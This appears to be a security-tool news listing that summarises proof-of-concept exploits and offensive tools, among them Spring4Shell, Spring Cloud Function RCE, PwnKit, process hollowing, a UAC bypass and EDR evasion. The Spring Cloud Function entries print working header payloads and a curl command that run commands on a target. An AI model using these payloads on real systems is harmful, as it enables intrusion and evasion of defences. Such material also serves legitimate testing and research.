Pocsploit – A Lightweight, Flexible And Novel Open Source Poc Verification Framework

pocsploit is a lightweight, flexible and novel open source poc verification framework Pain points of the POC framework in the market There are too many params, I don’t know how to get started, but only some of them are commonly used. YAML poc framework(like nuclei & xray) is not flexible enough. the conversion cost isRead More

Spring4Shell-POC – Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit

This is a dockerized application that is vulnerable to the Spring4Shell vulnerability (CVE-2022-22965). Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded by Tomcat. There is nothing special about this application, it’s a simple hello worldRead More

Spring-Spel-0Day-Poc – Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP

spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“open -a calculator.app”) build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipunzip v3.1.6.zipcd spring-cloud-function-3.1.6cd spring-cloud-function-samples/function-sample-pojomvn packagejava -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar get path lists for test find . -name “*.java”|xargs -I % cat %|grep -Eo ‘”([^” ./=>|,:}+)'”‘”‘]{8,})”‘|sort -u|sed ‘s/”//g’ …functionRouteruppercaselowercase… poc1 POST /functionRouter HTTP/1.1host: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15Connection: closespring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“openRead More

CVE-2022-22963 – PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $’POST’ -H $’Host:′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(“touch /tmp/test”)’ –data-binary $’exploit_poc’ $’’ Or using Burp suite: Credits https://github.com/hktalent/spring-spel-0day-poc Download CVE-2022-22963

CVE-2022-27254 – PoC For Vulnerability In Honda’s Remote Keyless System

PoC for vulnerability in Honda’s Remote Keyless System(CVE-2022-27254) Disclaimer: For educational purposes only. Kindly note that the discoverers for this vulnerability are Ayyappan Rajesh, a student at UMass Dartmouth and HackingIntoYourHeart. Others mentioned in this repository are credited for the support that they have provided but have played no active role in any research conductedRead More

PwnKit-Exploit – Proof Of Concept (PoC) CVE-2021-4034

Proof Of Concept (PoC) CVE-2021-4034  @c0br40x help to make this section in README!! Proof of Concept [email protected]:~/PwnKit-Exploit$ makecc -Wall exploit.c -o [email protected]:~/PwnKit-Exploit$ [email protected]:~/PwnKit-Exploit$ ./exploitCurrent User before execute [email protected]$whoami: debianExploit written by @luijait (0x6c75696a616974)[+] Enjoy your root if exploit was completed [email protected]:/home/debian/PwnKit-Exploit# [email protected]:/home/debian/PwnKit-Exploit# Fix Command Use sudo chmod 0755 pkexec Fix CVE 2021-4034 Installation & UseRead More

NimHollow – Nim Implementation Of Process Hollowing Using Syscalls (PoC)

Playing around with the Process Hollowing technique using Nim. Features: Direct syscalls for triggering Windows Native API functions with NimlineWhispers. Shellcode encryption/decryption with AES in CTR mode. Simple sandbox detection methods from the OSEP course by @offensive-security. AMSI patching with @rasta-mouse’s method is also inside (uncomment it for your needs). Usage Installation: ~$ git cloneRead More

DLLHijackingScanner – This Is A PoC For Bypassing UAC Using DLL Hijacking And Abusing The "Trusted Directories" Verification

This is a PoC for bypassing UAC using DLL hijacking and abusing the “Trusted Directories” verification. Generate Header from CSV The python script CsvToHeader.py can be used to generate a header file. By default it will use the CSV file dll_hijacking_candidates.csv that can be found here: dll_hijacking_candidates.csv. The script will check for each portable executable(PE)Read More

ThreadStackSpoofer – PoC For An Advanced In-Memory Evasion Technique Allowing To Better Hide Injected Shellcode’S Memory Allocation From Scanners And Analysts

[*] A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to bypass thread-based memory examination rules and better hide shellcodes while in-process memory. Intro This is an example implementation for Thread Stack Spoofing technique aiming to evade Malware Analysts, AVs and EDRs looking for references to shellcode’sRead More